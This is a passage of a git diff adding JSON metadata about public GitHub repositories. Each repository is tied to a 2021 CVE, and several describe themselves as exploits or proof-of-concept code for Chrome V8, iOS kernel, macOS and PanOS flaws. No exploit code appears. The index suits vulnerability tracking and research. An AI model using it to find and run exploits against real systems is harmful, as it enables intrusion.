"https:\/\/avatars.githubusercontent.com\/u\/38161463?v=4", + "html_url": "https:\/\/github.com\/Al1ex", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Al1ex\/CVE-2021-30461", + "description": "CVE-2021-30461", + "fork": false, + "created_at": "2021-05-11T04:09:04Z", + "updated_at": "2024-08-12T20:12:53Z", + "pushed_at": "2021-05-11T04:14:47Z", + "stargazers_count": 12, + "watchers_count": 12, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cve-2021-30461", + "voipmonitor" + ], + "visibility": "public", + "forks": 6, + "watchers": 12, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 386052413, + "name": "CVE-2021-30461", + "full_name": "puckiestyle\/CVE-2021-30461", + "owner": { + "login": "puckiestyle", + "id": 57447087, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/57447087?v=4", + "html_url": "https:\/\/github.com\/puckiestyle", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/puckiestyle\/CVE-2021-30461", + "description": null, + "fork": false, + "created_at": "2021-07-14T19:20:11Z", + "updated_at": "2023-01-10T03:22:58Z", + "pushed_at": "2021-07-14T19:20:21Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30481.json b/2021/CVE-2021-30481.json new file mode 100644 index 0000000000..1d6807850a --- /dev/null +++ b/2021/CVE-2021-30481.json @@ -0,0 +1,70 @@ +[ + { + "id": 358758520, + "name": "CVE-2021-30481", + "full_name": "floesen\/CVE-2021-30481", + "owner": { + "login": "floesen", + "id": 7890198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/7890198?v=4", + "html_url": "https:\/\/github.com\/floesen", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/floesen\/CVE-2021-30481", + "description": "https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2021-30481", + "fork": false, + "created_at": "2021-04-17T01:29:31Z", + "updated_at": "2024-01-31T19:03:44Z", + "pushed_at": "2021-04-20T16:00:46Z", + "stargazers_count": 54, + "watchers_count": 54, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 54, + "score": 0, + "subscribers_count": 4 + }, + { + "id": 808546624, + "name": "jhviw.github.io", + "full_name": "JHVIW\/jhviw.github.io", + "owner": { + "login": "JHVIW", + "id": 37812681, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/37812681?v=4", + "html_url": "https:\/\/github.com\/JHVIW", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/JHVIW\/jhviw.github.io", + "description": "Results of my research I have done on CVE-2021-30481 and on wallhacks in the videogame Counter-Strike 2", + "fork": false, + "created_at": "2024-05-31T09:43:39Z", + "updated_at": "2024-11-12T13:44:20Z", + "pushed_at": "2024-11-12T13:44:14Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "cheats", + "counter-strike-2", + "cs2", + "research-paper", + "research-project" + ], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30551.json b/2021/CVE-2021-30551.json new file mode 100644 index 0000000000..1857ea9c2d --- /dev/null +++ b/2021/CVE-2021-30551.json @@ -0,0 +1,33 @@ +[ + { + "id": 398816965, + "name": "CVE-2021-30551", + "full_name": "xmzyshypnc\/CVE-2021-30551", + "owner": { + "login": "xmzyshypnc", + "id": 21278314, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/21278314?v=4", + "html_url": "https:\/\/github.com\/xmzyshypnc", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/xmzyshypnc\/CVE-2021-30551", + "description": "my exp for chrome V8 CVE-2021-30551", + "fork": false, + "created_at": "2021-08-22T14:15:23Z", + "updated_at": "2024-09-29T07:35:07Z", + "pushed_at": "2023-04-04T06:29:52Z", + "stargazers_count": 23, + "watchers_count": 23, + "has_discussions": false, + "forks_count": 12, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 12, + "watchers": 23, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30573.json b/2021/CVE-2021-30573.json new file mode 100644 index 0000000000..4419f55eed --- /dev/null +++ b/2021/CVE-2021-30573.json @@ -0,0 +1,108 @@ +[ + { + "id": 390723249, + "name": "CVE-2021-30573-PoC-Google-Chrome", + "full_name": "s4eio\/CVE-2021-30573-PoC-Google-Chrome", + "owner": { + "login": "s4eio", + "id": 75635867, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/75635867?v=4", + "html_url": "https:\/\/github.com\/s4eio", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/s4eio\/CVE-2021-30573-PoC-Google-Chrome", + "description": "Google Chrome Use After Free vulnerability reported by S4E Team", + "fork": false, + "created_at": "2021-07-29T12:53:13Z", + "updated_at": "2024-08-12T20:15:06Z", + "pushed_at": "2021-07-29T13:18:38Z", + "stargazers_count": 14, + "watchers_count": 14, + "has_discussions": false, + "forks_count": 4, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 4, + "watchers": 14, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421034424, + "name": "CVE-2021-30573", + "full_name": "orangmuda\/CVE-2021-30573", + "owner": { + "login": "orangmuda", + "id": 91846073, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/91846073?v=4", + "html_url": "https:\/\/github.com\/orangmuda", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/orangmuda\/CVE-2021-30573", + "description": "Google Chrome Vulnerabilities CVE-2021-30573", + "fork": false, + "created_at": "2021-10-25T13:25:23Z", + "updated_at": "2024-08-12T20:17:31Z", + "pushed_at": "2021-10-31T21:47:51Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "chrome", + "cve-2021-30573" + ], + "visibility": "public", + "forks": 3, + "watchers": 10, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 421328933, + "name": "CVE-2021-30573", + "full_name": "kh4sh3i\/CVE-2021-30573", + "owner": { + "login": "kh4sh3i", + "id": 64693844, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/64693844?v=4", + "html_url": "https:\/\/github.com\/kh4sh3i", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kh4sh3i\/CVE-2021-30573", + "description": "Google Chrome Vulnerabilities CVE-2021-30573 allowed a remote attacker to potentially exploit heap corruption", + "fork": false, + "created_at": "2021-10-26T07:44:27Z", + "updated_at": "2023-10-16T14:26:36Z", + "pushed_at": "2021-10-26T08:55:41Z", + "stargazers_count": 2, + "watchers_count": 2, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [ + "attacker", + "chrome", + "cve", + "cve-2021-30573", + "googlechrome", + "heap", + "poc", + "remote", + "vulnerability" + ], + "visibility": "public", + "forks": 1, + "watchers": 2, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3060.json b/2021/CVE-2021-3060.json new file mode 100644 index 0000000000..202948ed53 --- /dev/null +++ b/2021/CVE-2021-3060.json @@ -0,0 +1,64 @@ +[ + { + "id": 520968780, + "name": "rqu1-cve-2021-3060.py", + "full_name": "timb-machine-mirrors\/rqu1-cve-2021-3060.py", + "owner": { + "login": "timb-machine-mirrors", + "id": 49810875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4", + "html_url": "https:\/\/github.com\/timb-machine-mirrors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timb-machine-mirrors\/rqu1-cve-2021-3060.py", + "description": "Clone from gist", + "fork": false, + "created_at": "2022-08-03T17:14:13Z", + "updated_at": "2023-04-08T19:10:35Z", + "pushed_at": "2022-08-03T17:14:52Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 700724228, + "name": "CVE-2021-3060", + "full_name": "anmolksachan\/CVE-2021-3060", + "owner": { + "login": "anmolksachan", + "id": 60771253, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/60771253?v=4", + "html_url": "https:\/\/github.com\/anmolksachan", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/anmolksachan\/CVE-2021-3060", + "description": "CVE-2021-3060", + "fork": false, + "created_at": "2023-10-05T07:04:46Z", + "updated_at": "2023-10-05T07:15:36Z", + "pushed_at": "2023-10-05T07:17:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30632.json b/2021/CVE-2021-30632.json new file mode 100644 index 0000000000..c5d00bbf5d --- /dev/null +++ b/2021/CVE-2021-30632.json @@ -0,0 +1,126 @@ +[ + { + "id": 408388456, + "name": "PoC-CVE-2021-30632", + "full_name": "Phuong39\/PoC-CVE-2021-30632", + "owner": { + "login": "Phuong39", + "id": 84000895, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/84000895?v=4", + "html_url": "https:\/\/github.com\/Phuong39", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Phuong39\/PoC-CVE-2021-30632", + "description": "PoC CVE-2021-30632 - Out of bounds write in V8", + "fork": false, + "created_at": "2021-09-20T09:49:51Z", + "updated_at": "2024-04-02T17:40:55Z", + "pushed_at": "2021-09-20T09:52:06Z", + "stargazers_count": 74, + "watchers_count": 74, + "has_discussions": false, + "forks_count": 15, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 15, + "watchers": 74, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 411162655, + "name": "CVE-2021-30632", + "full_name": "CrackerCat\/CVE-2021-30632", + "owner": { + "login": "CrackerCat", + "id": 17995064, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/17995064?v=4", + "html_url": "https:\/\/github.com\/CrackerCat", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/CrackerCat\/CVE-2021-30632", + "description": null, + "fork": false, + "created_at": "2021-09-28T06:27:49Z", + "updated_at": "2024-07-27T09:35:48Z", + "pushed_at": "2021-12-13T06:02:21Z", + "stargazers_count": 10, + "watchers_count": 10, + "has_discussions": false, + "forks_count": 25, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 25, + "watchers": 10, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 616847234, + "name": "ChExp_CVE-2021-30632", + "full_name": "maldev866\/ChExp_CVE-2021-30632", + "owner": { + "login": "maldev866", + "id": 118355132, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/118355132?v=4", + "html_url": "https:\/\/github.com\/maldev866", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/maldev866\/ChExp_CVE-2021-30632", + "description": null, + "fork": false, + "created_at": "2023-03-21T07:53:43Z", + "updated_at": "2023-03-21T07:54:36Z", + "pushed_at": "2023-03-21T07:58:46Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + }, + { + "id": 750651049, + "name": "CVE-2021-30632", + "full_name": "paulsery\/CVE-2021-30632", + "owner": { + "login": "paulsery", + "id": 1596893, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/1596893?v=4", + "html_url": "https:\/\/github.com\/paulsery", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/paulsery\/CVE-2021-30632", + "description": " m-y-mo: https:\/\/github.com\/github\/securitylab\/tree\/main\/SecurityExploits\/Chrome\/v8\/CVE-2021-30632", + "fork": false, + "created_at": "2024-01-31T03:28:58Z", + "updated_at": "2024-01-31T03:37:53Z", + "pushed_at": "2024-01-31T03:39:02Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-3064.json b/2021/CVE-2021-3064.json new file mode 100644 index 0000000000..c64266a942 --- /dev/null +++ b/2021/CVE-2021-3064.json @@ -0,0 +1,33 @@ +[ + { + "id": 485702535, + "name": "CVE-2021-3064", + "full_name": "0xhaggis\/CVE-2021-3064", + "owner": { + "login": "0xhaggis", + "id": 6735009, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/6735009?v=4", + "html_url": "https:\/\/github.com\/0xhaggis", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/0xhaggis\/CVE-2021-3064", + "description": "Exploit for CVE-2021-3036, HTTP Smuggling + buffer overflow in PanOS 8.x", + "fork": false, + "created_at": "2022-04-26T08:41:14Z", + "updated_at": "2023-10-07T10:25:38Z", + "pushed_at": "2023-06-21T21:01:05Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30641.json b/2021/CVE-2021-30641.json new file mode 100644 index 0000000000..8963fdb9d3 --- /dev/null +++ b/2021/CVE-2021-30641.json @@ -0,0 +1,33 @@ +[ + { + "id": 386163197, + "name": "CVE-2021-30641", + "full_name": "dja2TaqkGEEfA45\/CVE-2021-30641", + "owner": { + "login": "dja2TaqkGEEfA45", + "id": 82131630, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/82131630?v=4", + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/dja2TaqkGEEfA45\/CVE-2021-30641", + "description": null, + "fork": false, + "created_at": "2021-07-15T04:31:58Z", + "updated_at": "2021-07-15T04:31:58Z", + "pushed_at": "2021-07-15T04:31:59Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30657.json b/2021/CVE-2021-30657.json new file mode 100644 index 0000000000..8c24ad7a37 --- /dev/null +++ b/2021/CVE-2021-30657.json @@ -0,0 +1,33 @@ +[ + { + "id": 425584946, + "name": "CVE-2021-30657", + "full_name": "shubham0d\/CVE-2021-30657", + "owner": { + "login": "shubham0d", + "id": 12750163, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/12750163?v=4", + "html_url": "https:\/\/github.com\/shubham0d", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/shubham0d\/CVE-2021-30657", + "description": "A sample POC for CVE-2021-30657 affecting MacOS", + "fork": false, + "created_at": "2021-11-07T18:33:35Z", + "updated_at": "2024-07-17T14:31:42Z", + "pushed_at": "2021-11-08T19:35:28Z", + "stargazers_count": 31, + "watchers_count": 31, + "has_discussions": false, + "forks_count": 8, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 8, + "watchers": 31, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30682.json b/2021/CVE-2021-30682.json new file mode 100644 index 0000000000..9049604a4e --- /dev/null +++ b/2021/CVE-2021-30682.json @@ -0,0 +1,33 @@ +[ + { + "id": 417419424, + "name": "csp-playground", + "full_name": "threatnix\/csp-playground", + "owner": { + "login": "threatnix", + "id": 63774126, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63774126?v=4", + "html_url": "https:\/\/github.com\/threatnix", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/threatnix\/csp-playground", + "description": "CSP Playground for CVE-2021-30682", + "fork": false, + "created_at": "2021-10-15T08:10:02Z", + "updated_at": "2023-02-09T20:48:19Z", + "pushed_at": "2022-03-24T07:38:41Z", + "stargazers_count": 9, + "watchers_count": 9, + "has_discussions": false, + "forks_count": 3, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 3, + "watchers": 9, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30731.json b/2021/CVE-2021-30731.json new file mode 100644 index 0000000000..5f14ae6217 --- /dev/null +++ b/2021/CVE-2021-30731.json @@ -0,0 +1,33 @@ +[ + { + "id": 481094610, + "name": "WebcamViewer", + "full_name": "osy\/WebcamViewer", + "owner": { + "login": "osy", + "id": 50960678, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/50960678?v=4", + "html_url": "https:\/\/github.com\/osy", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/osy\/WebcamViewer", + "description": "PoC of CVE-2021-30731", + "fork": false, + "created_at": "2022-04-13T06:13:24Z", + "updated_at": "2024-10-08T07:35:29Z", + "pushed_at": "2022-04-13T18:57:06Z", + "stargazers_count": 7, + "watchers_count": 7, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 7, + "score": 0, + "subscribers_count": 2 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30807.json b/2021/CVE-2021-30807.json new file mode 100644 index 0000000000..c550c54d00 --- /dev/null +++ b/2021/CVE-2021-30807.json @@ -0,0 +1,64 @@ +[ + { + "id": 415412072, + "name": "iomfb-exploit", + "full_name": "jsherman212\/iomfb-exploit", + "owner": { + "login": "jsherman212", + "id": 42921048, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/42921048?v=4", + "html_url": "https:\/\/github.com\/jsherman212", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jsherman212\/iomfb-exploit", + "description": "Exploit for CVE-2021-30807", + "fork": false, + "created_at": "2021-10-09T20:11:42Z", + "updated_at": "2024-11-10T14:44:04Z", + "pushed_at": "2021-11-29T13:50:42Z", + "stargazers_count": 130, + "watchers_count": 130, + "has_discussions": false, + "forks_count": 31, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 31, + "watchers": 130, + "score": 0, + "subscribers_count": 5 + }, + { + "id": 433471856, + "name": "gex", + "full_name": "30440r\/gex", + "owner": { + "login": "30440r", + "id": 63462198, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/63462198?v=4", + "html_url": "https:\/\/github.com\/30440r", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/30440r\/gex", + "description": "Gex is an iOS 14.7 jailbreak using CVE-2021-30807 IOMFB & CVE-2021-30860 exploit(s)", + "fork": false, + "created_at": "2021-11-30T14:56:04Z", + "updated_at": "2024-04-16T17:33:09Z", + "pushed_at": "2022-02-12T14:53:09Z", + "stargazers_count": 5, + "watchers_count": 5, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 5, + "score": 0, + "subscribers_count": 3 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30858.json b/2021/CVE-2021-30858.json new file mode 100644 index 0000000000..da316abfff --- /dev/null +++ b/2021/CVE-2021-30858.json @@ -0,0 +1,64 @@ +[ + { + "id": 416955164, + "name": "CVEREV3", + "full_name": "kmeps4\/CVEREV3", + "owner": { + "login": "kmeps4", + "id": 77245601, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/77245601?v=4", + "html_url": "https:\/\/github.com\/kmeps4", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/kmeps4\/CVEREV3", + "description": "Testing CVE-2021-30858 Rev3", + "fork": false, + "created_at": "2021-10-14T01:51:39Z", + "updated_at": "2022-04-13T12:49:05Z", + "pushed_at": "2021-10-14T22:07:47Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 417176378, + "name": "ps4_8.00_vuln_poc", + "full_name": "Jeromeyoung\/ps4_8.00_vuln_poc", + "owner": { + "login": "Jeromeyoung", + "id": 39945364, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/39945364?v=4", + "html_url": "https:\/\/github.com\/Jeromeyoung", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Jeromeyoung\/ps4_8.00_vuln_poc", + "description": "My take on CVE-2021-30858 for ps4 8.xx", + "fork": false, + "created_at": "2021-10-14T15:05:49Z", + "updated_at": "2021-10-21T14:16:32Z", + "pushed_at": "2021-10-14T14:13:10Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30860.json b/2021/CVE-2021-30860.json new file mode 100644 index 0000000000..e1081f954d --- /dev/null +++ b/2021/CVE-2021-30860.json @@ -0,0 +1,64 @@ +[ + { + "id": 407978411, + "name": "CVE-2021-30860", + "full_name": "Levilutz\/CVE-2021-30860", + "owner": { + "login": "Levilutz", + "id": 22489327, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/22489327?v=4", + "html_url": "https:\/\/github.com\/Levilutz", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/Levilutz\/CVE-2021-30860", + "description": "Scan for evidence of CVE-2021-30860 (FORCEDENTRY) exploit", + "fork": false, + "created_at": "2021-09-18T22:14:17Z", + "updated_at": "2024-08-12T20:16:33Z", + "pushed_at": "2021-09-21T04:31:01Z", + "stargazers_count": 11, + "watchers_count": 11, + "has_discussions": false, + "forks_count": 6, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 6, + "watchers": 11, + "score": 0, + "subscribers_count": 3 + }, + { + "id": 441593216, + "name": "CVE-2021-30860", + "full_name": "jeffssh\/CVE-2021-30860", + "owner": { + "login": "jeffssh", + "id": 25801559, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/25801559?v=4", + "html_url": "https:\/\/github.com\/jeffssh", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/jeffssh\/CVE-2021-30860", + "description": "Collection of materials relating to FORCEDENTRY", + "fork": false, + "created_at": "2021-12-25T03:00:01Z", + "updated_at": "2024-09-23T15:54:25Z", + "pushed_at": "2024-03-30T22:17:05Z", + "stargazers_count": 92, + "watchers_count": 92, + "has_discussions": false, + "forks_count": 24, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 24, + "watchers": 92, + "score": 0, + "subscribers_count": 5 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30937.json b/2021/CVE-2021-30937.json new file mode 100644 index 0000000000..8d5b6f7ad7 --- /dev/null +++ b/2021/CVE-2021-30937.json @@ -0,0 +1,33 @@ +[ + { + "id": 486636223, + "name": "ExploiteameEsta", + "full_name": "realrodri\/ExploiteameEsta", + "owner": { + "login": "realrodri", + "id": 40494400, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/40494400?v=4", + "html_url": "https:\/\/github.com\/realrodri", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/realrodri\/ExploiteameEsta", + "description": "CVE-2021-30937 vulnerability checking app", + "fork": false, + "created_at": "2022-04-28T14:50:00Z", + "updated_at": "2022-04-28T14:52:37Z", + "pushed_at": "2022-04-28T18:00:08Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 1 + } +] \ No newline at end of file diff --git a/2021/CVE-2021-30955.json b/2021/CVE-2021-30955.json new file mode 100644 index 0000000000..b56a751f63 --- /dev/null +++ b/2021/CVE-2021-30955.json @@ -0,0 +1,223 @@ +[ + { + "id": 464524453, + "name": "jakeajames-CVE-2021-30955", + "full_name": "timb-machine-mirrors\/jakeajames-CVE-2021-30955", + "owner": { + "login": "timb-machine-mirrors", + "id": 49810875, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/49810875?v=4", + "html_url": "https:\/\/github.com\/timb-machine-mirrors", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/timb-machine-mirrors\/jakeajames-CVE-2021-30955", + "description": "Clone from gist", + "fork": false, + "created_at": "2022-02-28T14:54:10Z", + "updated_at": "2023-04-08T19:23:43Z", + "pushed_at": "2022-02-28T14:54:19Z", + "stargazers_count": 0, + "watchers_count": 0, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 0, + "score": 0, + "subscribers_count": 0 + }, + { + "id": 464663598, + "name": "CVE-2021-30955-POC", + "full_name": "nickorlow\/CVE-2021-30955-POC", + "owner": { + "login": "nickorlow", + "id": 56371027, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/56371027?v=4", + "html_url": "https:\/\/github.com\/nickorlow", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/nickorlow\/CVE-2021-30955-POC", + "description": "Jake Jame's proof of concept wrapped into an iOS app for CVE-2021-30955", + "fork": false, + "created_at": "2022-02-28T22:23:51Z", + "updated_at": "2022-06-01T11:14:21Z", + "pushed_at": "2022-02-28T22:27:53Z", + "stargazers_count": 1, + "watchers_count": 1, + "has_discussions": false, + "forks_count": 1, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 1, + "watchers": 1, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 464677668, + "name": "CVE-2021-30955-POC-IPA", + "full_name": "verygenericname\/CVE-2021-30955-POC-IPA", + "owner": { + "login": "verygenericname", + "id": 87825638, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/87825638?v=4", + "html_url": "https:\/\/github.com\/verygenericname", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/verygenericname\/CVE-2021-30955-POC-IPA", + "description": "https:\/\/gist.github.com\/jakeajames\/37f72c58c775bfbdda3aa9575149a8aa compiled into a ipa 15.0-15.2b1", + "fork": false, + "created_at": "2022-02-28T23:28:39Z", + "updated_at": "2022-03-25T17:16:23Z", + "pushed_at": "2022-03-01T11:39:28Z", + "stargazers_count": 3, + "watchers_count": 3, + "has_discussions": false, + "forks_count": 0, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 0, + "watchers": 3, + "score": 0, + "subscribers_count": 2 + }, + { + "id": 464887929, + "name": "desc_race", + "full_name": "b1n4r1b01\/desc_race", + "owner": { + "login": "b1n4r1b01", + "id": 46951815, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/46951815?v=4", + "html_url": "https:\/\/github.com\/b1n4r1b01", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/b1n4r1b01\/desc_race", + "description": "iOS 15.1 kernel exploit POC for CVE-2021-30955", + "fork": false, + "created_at": "2022-03-01T12:41:03Z", + "updated_at": "2024-11-16T08:09:19Z", + "pushed_at": "2022-03-01T16:11:31Z", + "stargazers_count": 253, + "watchers_count": 253, + "has_discussions": false, + "forks_count": 43, + "allow_forking": true, + "is_template": false, + "web_commit_signoff_required": false, + "topics": [], + "visibility": "public", + "forks": 43, + "watchers": 253, + "score": 0, + "subscribers_count": 8 + }, + { + "id": 469611099, + "name": "desc_race_A15", + "full_name": "markie-dev\/desc_race_A15", + "owner": { + "login": "markie-dev", + "id": 34432591, + "avatar_url": "https:\/\/avatars.githubusercontent.com\/u\/34432591?v=4", + "html_url": "https:\/\/github.com\/markie-dev", + "user_view_type": "public" + }, + "html_url": "https:\/\/github.com\/markie-dev\/desc_race_A15", + "description": "CVE-2021-30955 iOS 15.1.1 POC for 6GB RAM devices (A14-A15)", + "fork": false, + "created_at": "2022-03-14T06:42:45Z", + "updated_at": "2024-01-16T13:35:13Z", + "pushed_at": "2022-03-14T07:58:37Z", + "stargazers_count": 48, + "watchers_count": 48, + "has_discussions": false, 